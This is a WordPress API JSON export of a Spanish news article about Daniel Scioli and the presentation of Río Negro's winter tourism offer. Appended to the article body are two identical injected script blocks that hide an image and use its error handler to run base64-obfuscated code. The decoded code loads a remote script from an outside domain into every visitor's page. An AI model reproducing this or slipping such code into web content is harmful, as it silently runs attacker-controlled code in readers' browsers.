{"id":5255,"date":"2025-06-12T08:57:23","date_gmt":"2025-06-12T11:57:23","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5255"},"modified":"2025-08-13T23:29:59","modified_gmt":"2025-08-14T02:29:59","slug":"scioli-aseguro-los-argentinos-y-el-mundo-redescubrimos-nuestro-pais","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5255","title":{"rendered":"Scioli asegur\u00f3: \u201cLos argentinos y el mundo redescubrimos nuestro pa\u00eds\u201d"},"content":{"rendered":"\n<p><strong><em>Lo dijo durante el acto de presentaci\u00f3n de la oferta tur\u00edstica de la provincia de R\u00edo Negro para este invierno.<\/em><\/strong><\/p>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;<strong>Daniel Scioli<\/strong>, asisti\u00f3 al lanzamiento de la temporada invernal rionegrina, donde se expusieron las atracciones tur\u00edsticas preparadas para este a\u00f1o.<\/p>\n\n\n\n<p><strong>Scioli<\/strong>&nbsp;argument\u00f3 en el evento: \u00ab<em>Tenemos muy buenas expectativas para la temporada de invierno ya que venimos trabajando articuladamente con el gobierno y los intendentes de la provincia<\/em>\u00ab. \u00ab<em>Quiero destacar los esfuerzos para mantener los precios, para ser competitivos. Por eso no tengo dudas de que, como en el verano, cuando presagiaron un desastre y fue un \u00e9xito, esta temporada de invierno tambi\u00e9n lo ser\u00e1<\/em>\u00ab, agreg\u00f3.<\/p>\n\n\n\n<p>Adem\u00e1s, asegur\u00f3: \u00ab<em>Los argentinos y el mundo redescubrimos nuestro pa\u00eds. Tenemos mucho para ofrecer<\/em>\u201d, a lo que sum\u00f3: \u00ab<em>La industria del turismo est\u00e1 en una etapa refundacional. Impulsamos la capacitaci\u00f3n y la calidad para poner en valor el esfuerzo que hacen las provincias en materia gastron\u00f3mica, de infraestructura y en oferta de actividades<\/em>\u00ab.<\/p>\n\n\n\n<p>Finalmente, el funcionario se refiri\u00f3 al \u00ab<em>ordenamiento de la econom\u00eda, al armado de paquetes tur\u00edsticos, a la pol\u00edtica de cielos abiertos y las campa\u00f1as focalizadas de promoci\u00f3n que permiten que el pa\u00eds sea una potencia de desarrollo tur\u00edstico<\/em>\u00ab.<\/p>\n\n\n\n<p>Durante el lanzamiento, se presentaron los principales destinos y actividades de la provincia, entre los que se destacan las ciudades de&nbsp;<strong>Viedma<\/strong>,&nbsp;<strong>San Carlos de Bariloche<\/strong>,&nbsp;<strong>Las Grutas<\/strong>,&nbsp;<strong>San Antonio Oeste<\/strong>&nbsp;y&nbsp;<strong>El Bols\u00f3n<\/strong>, el tren patag\u00f3nico y el camino de la costa.<\/p>\n\n\n\n<p>El ministro de Gobierno, Trabajo y Turismo de Rio Negro,&nbsp;<strong>Fabian Gatti<\/strong>, tambi\u00e9n presente en el acto, agradeci\u00f3 \u00ab<em>la posibilidad de poder compartir la presentaci\u00f3n de la temporada de invierno de todos los destinos de la provincia<\/em>\u00ab.<\/p>\n\n\n\n<p>Adem\u00e1s, la subsecretaria de Turismo de la misma jurisdicci\u00f3n,&nbsp;<strong>Marisol Mart\u00ednez<\/strong>, destac\u00f3 que \u00ab<em>los protagonistas son los destinos de la provincia, por eso acercamos la oferta tur\u00edstica de cada localidad<\/em>\u00ab.<\/p>\n\n\n\n<p>Tambi\u00e9n participaron en el encuentro el presidente de la C\u00e1mara Argentina de Turismo (CAT),&nbsp;<strong>Gustavo Hani<\/strong>; el presidente de la Confederaci\u00f3n Argentina de la Mediana Empresa (CAME),&nbsp;<strong>Ricardo Diab<\/strong>; y los intendentes de Bariloche,&nbsp;<strong>Walter Cort\u00e9s<\/strong>; de El Bols\u00f3n,&nbsp;<strong>Bruno Pogliano<\/strong>; y de Las Grutas,<strong>Adrian&nbsp;Casadei<\/strong>.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Lo dijo durante el acto de presentaci\u00f3n de la oferta tur\u00edstica de la provincia de R\u00edo Negro para este invierno. El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;Daniel Scioli, asisti\u00f3 al lanzamiento de la temporada invernal rionegrina, donde se expusieron las atracciones tur\u00edsticas preparadas para este a\u00f1o. Scioli&nbsp;argument\u00f3 en el evento: \u00abTenemos muy [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5256,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-5255","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5255"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5255"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5255\/revisions"}],"predecessor-version":[{"id":6462,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5255\/revisions\/6462"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5256"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5255"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5255"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5255"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}